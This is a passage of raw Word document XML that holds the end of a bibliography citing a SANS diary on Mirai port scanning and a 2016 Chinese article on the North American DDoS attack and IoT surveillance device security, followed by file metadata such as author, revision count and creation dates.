            <b:Last>Bambenek</b:Last>
            <b:First>John</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mirai Scanning for Port 6789 Looking for New Victims / Now hitting tcp/23231</b:Title>
    <b:URL>https://isc.sans.edu/forums/diary/UPDATED+x1+Mirai+Scanning+for+Port+6789+Looking+for+New+Victims+Now+hitting+tcp23231/21833/</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>匡恩网16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{E781E1F5-D11D-4B6A-B953-B0DAD4831834}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>匡恩网络</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>北美DDoS事件与IOT安防监控设备安全</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>10</b:Month>
    <b:Day>24</b:Day>
    <b:URL>http://www.kuangn.com/news/industry/detail/458.html</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{80E08F97-B0F1-4287-AC34-95B714283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7275</TotalTime>
  <Pages>11</Pages>
  <Words>1964</Words>
  <Characters>11198</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>93</Lines>
  <Paragraphs>26</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13136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limz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>limz</cp:lastModifiedBy>
  <cp:revision>228</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-07T06:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-15T12:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>